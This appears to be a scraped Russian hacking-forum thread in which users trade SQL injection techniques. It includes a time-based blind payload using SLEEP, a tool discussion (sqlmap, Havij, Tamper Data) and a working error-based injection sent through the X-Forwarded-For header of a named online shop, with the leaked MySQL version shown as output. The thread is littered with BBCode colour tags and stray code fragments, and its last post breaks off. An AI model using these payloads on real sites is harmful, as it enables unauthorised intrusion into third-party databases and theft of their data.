 |
|
05.01.2013, 21:00
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами:
7167926
Репутация:
20
|
|
Как можно автоматизировать sqli через X-Forwarded-For: ?
|
|
|
06.01.2013, 02:24
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
помогите найти ман по time based sql inj или покажите как крутить на примере http://www.exploit-db.com/exploits/18618/
буду рад любой помощи
вроде понял
Сообщение от https://rdot.org/forum/showthread.php?t=124
3.4 Посимвольный перебор с помощью SLEEP Чтож про бенчмарк мы прочитали. И все обратили внимание на жуткую не стабильность этого метода. Что делать спросите вы? Вот что. С 5 ветки MySQL появился оператор SLEEP(). По сути эта функция и создает нужную нам задержку в ответе веб сервера, и, заметьте, без ненужных нагрузок на него. То есть SLEEP() является лучшей альтернативой BENCHMARK() и юзать желательно ее, но повторюсь единственный минус - эта функция появилась только аж в 5-ой ветке. Сказка, да и только. Как юзать? Все элементрано: http://xxx/news.php?id=-1' OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) -- Я юзаю значение в две - три секнуды, но вам советую подобрать его в соответствии с каналом сервера, так как могут возникнуть погрешности в выводе.
|
|
|
|
06.01.2013, 02:42
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
С нами:
9126697
Репутация:
97
|
|
Сообщение от Vip77
Как можно автоматизировать sqli через X-Forwarded-For: ?
Какой-нибудь плагин вроде tamper data.
|
|
|
|
06.01.2013, 06:28
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
Подскажите прогу/скрипт для брутфорса/дампинга blind time based mysql инъекций.
|
|
|
|
06.01.2013, 07:38
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
Сообщение от wkar
Подскажите прогу/скрипт для брутфорса/дампинга blind time based mysql инъекций.
чем вас не устраивает sqlmap?!
|
|
|
|
06.01.2013, 14:24
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
Сообщение от Faaax
чем вас не устраивает sqlmap?!
слишком крутая прога для меня
по сути я не знаю как засунуть в нее скуль такого типа:
.ru/index.php/404' AND IF((SELECT ascii(substr(table_name,1,1)) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)
|
|
|
|
06.01.2013, 19:01
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами:
7167926
Репутация:
20
|
|
Может знает кто как раскрутить
Код:
GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
Host: www.3ona51.com
X-Forwarded-For: "
|
|
|
|
06.01.2013, 19:51
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от Vip77
Может знает кто как раскрутить
Код:
GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
Host: www.3ona51.com
X-Forwarded-For: "
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]GET[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]gaming[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]accessories[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]razer[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]rechargeble[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]lithium[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ion[/COLOR][COLOR="#007700"]-for-[/COLOR][COLOR="#0000BB"]mamba[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]elit[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]naga[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]epic[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]star[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]wars[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]000010[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1
Host[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www.3ona51[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com
X[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Forwarded[/COLOR][COLOR="#007700"]-For:[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#DD0000"]", 19243580, 3, 71805)on duplicate key update a=(select 1 from(select count(*),mid(version(),rand(0)|0)x from information_schema.tables group by x)a)#[/COLOR][/COLOR]
MySQL[1062]: Duplicate entry ' 5.5.13' for key 'group_key'
|
|
|
|
06.01.2013, 20:16
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от cat1vo
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]GET[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]gaming[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]accessories[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]razer[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]rechargeble[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]lithium[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ion[/COLOR][COLOR="#007700"]-for-[/COLOR][COLOR="#0000BB"]mamba[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]elit[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]naga[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]epic[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]star[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]wars[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]000010[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1
Host[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www.3ona51[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com
X[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Forwarded[/COLOR][COLOR="#007700"]-For:[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#DD0000"]", 19243580, 3, 71805)on duplicate key update a=(select 1 from(select count(*),mid(version(),rand(0)|0)x from information_schema.tables group by x)a)#[/COLOR][/COLOR]
MySQL[1062]: Duplicate entry '
5.5.13
' for key 'group_key' как првильно вставить в скрипт данные, чтобы получить такой результат?
IP: ' . $_SERVER[REMOTE_ADDR].
'
User-Agent: ' . $_SERVER['HTTP_USER_AGENT'].
'
X-Forwarded-For: ' . $_SERVER['HTTP_X_FORWARDED_FOR'].
'
X-Forwarded: ' . $_SERVER['HTTP_X_FORWARDED'].
'
Forwarded-for: ' . $_SERVER['HTTP_FORWARDED_FOR'].
'
Forwarded: ' . $_SERVER['HTTP_FORWARDED'].
'
Via: ' . $_SERVER['HTTP_VIA'].
'';
echo "All headers";
echo "";
print_r($_SERVER);
echo "";
?>
|
|
|
|
07.01.2013, 00:34
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
Сообщение от Vip77
Как можно автоматизировать sqli через X-Forwarded-For: ?
Сообщение от herfleisch
Какой-нибудь плагин вроде tamper data.
" if author else f"
Vip77 said:
Как можно автоматизировать sqli через X-Forwarded-For: ?
Сообщение от herfleisch
Какой-нибудь плагин вроде tamper data.
Tamper Data облегчает процесс, но не автоматизирует его. Этим вполне может заняться связка havij + php:
[PHP]
[COLOR="#000000"][COLOR="#007700"]
__________________
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
